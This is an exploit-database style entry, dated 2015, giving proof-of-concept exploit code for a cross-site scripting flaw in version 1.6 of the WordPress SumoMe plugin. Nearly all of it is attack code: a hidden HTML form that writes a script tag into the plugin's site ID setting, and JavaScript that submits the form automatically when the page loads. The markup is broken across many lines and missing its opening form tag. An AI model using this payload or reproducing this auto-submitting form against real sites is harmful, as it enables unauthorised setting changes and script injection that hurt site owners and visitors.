######################
# Exploit Title : Wordpress sumome 1.6 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/sumome/
# Software Link :https://downloads.wordpress.org/plugin/sumome.zip
# Date : 2015-01-03
# Tested on : Windows 7 / Mozilla Firefox
######################
######################
Exploit Code:
<
html
>
<
body
>
<
style
>
#test{
display:none;
}
</
style
>
<
div
id
=
"test"
>
<
input
type
=
'hidden'
name
=
'option_page'
value
=
'sumome'
/><
input
type
=
"hidden"
name
=
"action"
value
=
"update"
/><
input
type
=
"hidden"
id
=
"_wpnonce"
name
=
"_wpnonce"
value
=
"934a83b2a9"
/><
input
type
=
"hidden"
name
=
"_wp_http_referer"
value
=
"/wordpress/wp-admin/options-general.php?page=sumome&settings-updated=true"
/> <
div
class
=
"sumome-instructions"
>
<
input
type
=
"text"
name
=
"sumome_site_id"
id
=
"sumome_site_id"
value='"><
script
>alert(1)</
script
>' style="width: 540px"
<
p
class
=
"submit"
><
input
type
=
"submit"
name
=
"submit"
id
=
"submit"
class
=
"button button-primary"
value
=
"Save Changes"
/></
p
> </
form
>
</
div
>
**********
function clickin(){
document.getElementById('submit').click()
}setTimeout("clickin()",0000);
</
script
>
</
body
>
</
html
>